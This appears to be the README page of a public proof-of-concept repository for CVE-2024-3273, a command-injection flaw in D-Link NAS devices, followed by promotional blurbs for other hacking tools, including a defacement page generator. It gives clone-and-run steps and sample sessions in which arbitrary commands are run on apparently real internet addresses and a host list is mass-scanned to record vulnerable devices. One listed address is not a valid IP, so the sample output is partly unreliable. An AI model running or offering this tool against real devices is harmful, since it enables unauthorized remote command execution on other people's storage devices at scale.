This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.
The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi
endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
requests
librarygit clone https://github.com/adhikara13/CVE-2024-3273.git
2. Navigate to the repository directory:
cd CVE-2024-3273
3. Run the PoC:
python main.py
4. Follow the on-screen instructions to choose the target device:
host:port
, and choose whether to export vulnerable hosts to vulnerables.txt
.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Dive into the world of cybersecurity with GoHTools, a comprehensive collection of hacking utilities crafted…
DefGen allows you to create your personalized HTML defacing webpage pre-integrated with CSS and JavaScript.…
Dive into the world of colorlight-riscv-rs, where we embark on an exciting journey to manipulate…
This is a diverse collection of scripts used for OSINT, ethical hacking, and web application…
A tool crafted with simplicity in mind but harboring its own set of flaws. Despite…
CyberSentry is a robust automated scanning tool designed for web applications. It helps security professionals, ethical…